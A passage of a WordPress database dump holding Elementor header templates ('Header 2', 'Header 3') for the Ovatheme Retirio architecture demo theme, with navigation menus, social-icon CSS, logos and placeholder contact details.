06:47:56','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&amp;p=12',0,'ova_framework_hf_el','',0),(4634,1,'2022-06-07 07:05:50','2022-06-07 07:05:50','<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/ZVfpkGDfAhHGSeGJ6\">30 Commercial Road Fratton, Australia</a>								</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					Mon - Sat: 8.00 am - 7.00 pm																			</li>\n											</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 2','','publish','closed','closed','','header-2-2','','','2022-06-07 07:05:50','2022-06-07 07:05:50','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&amp;p=51',0,'ova_framework_hf_el','',0),(4635,1,'2022-06-07 07:25:33','2022-06-07 07:25:33','Call anytime						\n					<ul>\n								<li>\n																					<a href=\"tel:+23425446680 \">\n													+23 425 4466 80												</a>\n																			</li>\n											</ul>\n											<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							Send email						\n					<ul>\n								<li>\n																					<a href=\"mailto:needhelp@company.com \">\n													needhelp@company.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li id=\"menu-item-790\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li id=\"menu-item-1092\"><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li id=\"menu-item-1094\"><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li id=\"menu-item-1095\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li id=\"menu-item-1096\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li id=\"menu-item-1097\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li id=\"menu-item-1098\"><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://demo.ovatheme.com/retirio/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Pages</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li><a href=\"https://demo.ovatheme.com/retirio/shop/\">Shop</a></li>\n<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog</a>\n<ul>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/\">Blog Default</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?layout_sidebar=layout_1c\">Default No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid\">Blog Grid</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=grid&#038;layout_sidebar=layout_1c\">Grid No Sidebar</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry\">Blog Masonry</a></li>\n	<li><a href=\"https://demo.ovatheme.com/retirio/blog/?blog_template=masonry&#038;layout_sidebar=layout_1c\">Masonry No Sidebar</a></li>\n</ul>\n</li>\n</ul>			</nav>\n        </nav>','Header 3','','publish','closed','closed','','header-3-2','','','2022-06-07 07:25:33','2022-06-07 07:25:33','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&amp;p=78',0,'ova_framework_hf_el','',0),(4636,1,'2022-06-07 09:06:59','2022-06-07 09:06:59','<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-29\"><a href=\"https://demo.ovatheme.com/retirio/\">Home</a>\n<ul>\n	<li id=\"menu-item-30\"><a href=\"https://demo.ovatheme.com/retirio/\">Home 1</a></li>\n	<li id=\"menu-item-31\"><a href=\"https://demo.ovatheme.com/retirio/home-2/\">Home 2</a></li>\n	<li id=\"menu-item-32\"><a href=\"https://demo.ovatheme.com/retirio/home-3/\">Home 3</a></li>\n</ul>\n</li>\n<li id=\"menu-item-33\"><a href=\"#\">Pages</a>\n<ul>\n	<li id=\"menu-item-774\"><a href=\"https://demo.ovatheme.com/retirio/about/\">About</a></li>\n	<li id=\"menu-item-773\"><a href=\"https://demo.ovatheme.com/retirio/contact/\">Contact</a></li>\n	<li id=\"menu-item-1046\"><a href=\"https://demo.ovatheme.com/retirio/team\">Our Team</a></li>\n	<li id=\"menu-item-2483\"><a href=\"https://demo.ovatheme.com/retirio/team/aleesha-brown/\">Team Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-1368\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Services</a>\n<ul>\n	<li id=\"menu-item-2472\"><a href=\"https://demo.ovatheme.com/retirio/services/\">Service Listing</a></li>\n	<li id=\"menu-item-2471\"><a href=\"https://demo.ovatheme.com/retirio/service/architecture/\">Service Detail</a></li>\n</ul>\n</li>\n<li id=\"menu-item-35\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-365\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_1\">Archive Project 1</a></li>\n	<li id=\"menu-item-366\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_2&#038;posts_per_page=7\">Archive Project 2</a></li>\n	<li id=\"menu-item-367\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_3\">Archive Project 3</a></li>\n	<li id=\"menu-item-368\"><a href=\"https://demo.ovatheme.com/retirio/project/?template=template_4&#038;posts_per_page=7\">Archive Project 4</a></li>\n	<li id=\"menu-item-569\"><a href=\"https://demo.ovatheme.com/retirio/project-5/\">Element Projects 5</a></li>\n	<li id=\"menu-item-568\"><a href=\"https://demo.ovatheme.com/retirio/project-6/\">Element Projects 6</a></li>\n	<li id=\"menu-item-4612\"><a href=\"https://demo.ovatheme.com/retirio/project-7/\">Element Projects 7</a></li>\n	<li id=\"menu-item-1169\"><a href=\"https://demo.ovatheme.com/retirio/project/modern-villa/\">Single Project</a></li>\n</ul>\n</li>\n<li id=\"menu-item-3426\"><a 